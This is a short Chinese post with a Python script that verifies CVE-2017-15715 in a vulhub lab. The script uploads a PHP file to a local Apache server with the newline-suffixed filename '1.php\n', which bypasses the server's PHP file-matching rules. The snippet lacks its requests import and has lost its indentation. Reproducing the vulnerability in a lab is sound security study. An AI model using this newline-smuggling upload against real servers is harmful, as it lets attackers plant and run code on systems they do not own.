python实现文件上传,同时实现上传文件名后缀添加回车符(\n),顺便验证了CVE-2017-15715漏洞。关于漏洞详情参见:https://vulhub.org/#/environments/httpd/CVE-2017-15715/
1、upload.html 前端上传页面
2、50229.php 将要上传的文件
3、test.py
url = 'http://192.168.1.58:8080/' # your url
fl = open(r'd:\50229.php', 'rb')
rs = requests.post(url, files={'file': ('50229.php', fl, 'application/octet-stream'),
'name': (None, '1.php\n')})
if rs.status_code == 200:
print('上传成功' if rs.text == '' else rs.text)